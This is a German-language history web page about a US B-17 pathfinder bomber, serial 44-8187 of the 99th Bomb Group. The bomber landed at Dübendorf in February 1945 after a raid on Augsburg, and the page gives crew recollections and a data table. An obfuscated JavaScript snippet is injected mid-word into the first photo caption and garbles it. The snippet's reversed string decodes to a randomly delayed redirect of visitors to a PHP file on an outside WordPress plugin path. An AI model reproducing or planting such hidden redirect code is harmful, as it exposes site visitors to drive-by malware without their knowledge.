Ereignisse

Pathfindermaschine

Der Bomber mit dem Kennzeichen I ist nach einem Einsatz über Augsburg in Dübendorf gelandet. Am 19.09.1945 nach Burtonwood zurück gekehrt.

Zwei Motoren waren ausgefallen und in den Tanks war nur noch wenig Treibstoff, aber die Maschine von Capt Smith l<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andete normal in Dübendorf. (304_1)“ width=“800″ height=“208″ /> Zwei Motoren waren ausgefallen und in den Tanks war nur noch wenig Treibstoff, aber die Maschine von Capt Smith landete normal in Dübendorf. (304_1)

Der Bomber der 15h Air Force, 99th Bomb Group mit dem Kennzeichen I ist nach einem Einsatz über Augsburg in Dübendorf gelandet und wurde am 19.09.1945 nach Burtonwood zurückgeflogen. Capt Leonard Smith und seine Crew flogen diese Pfadfindermaschine. LT Conrad Headley wurde durch 1Lt John B. Morat ausgewechselt. Capt Smith beschrieb die Mission wie folgt: Normalerweise flogen wir eine andere B-17, die „Bugs Buddy Budda Doc“, aber heute flogen wir „Mickey“ mit dem Radar. Wir waren die letzte Gruppe die das Ziel Augsburg überflogen. Die Flak war besonders stark und es erwischte viele unserer Gruppe. Der Schütze SGT Victor A. Fabiniak erzählt weiter: Die Flak über dem Ziel war so heftig, dass man hätte darauf herumlaufen können. Wir verloren rasch Höhe und machten uns zum Aussteigen bereit. Da sah ich aus dem Fenster zwei Schweizer Jäger die uns nach Dübendorf eskortierten.


Ereignissdatum 27.2.1945
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-17 Flying Fortress
Flugzeugbezeichnung B-17 G-50-VE
Einteilung 15th Air Force, 99th Bomb Group, 346th Squadron
Basis Tortorella (I)
Auftrag Bombardierung
Einsatzziel Augsburg (D)
Rückkehr 19.09.1945 Rückkehr nach Burtonwood (GB)
Werknummer 44-8187
Kennzeichen I
CH Archiv Nr. A160
Besatzung Pilot: Leonard Smith, 1st Lt
Copilot: John B. Morat, 1st Lt
Navigator: Albert L. Wilcox, Jr., 1st Lt
Radar Navigator: Paul W. Shank, 2nd Lt
Bombardier: Walter A. Mucek, 2nd Lt
Engineer: Benjamin r. McConnell, T/Sgt
Radio: Clement J. Fischbach, S/Sgt
Waist Gunner: Leon Estes, Jr., S/Sgt
Waist Gunner: Frederick J. Shorten, S/Sgt
Tail Gunner: Victor A. Fabiniak, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer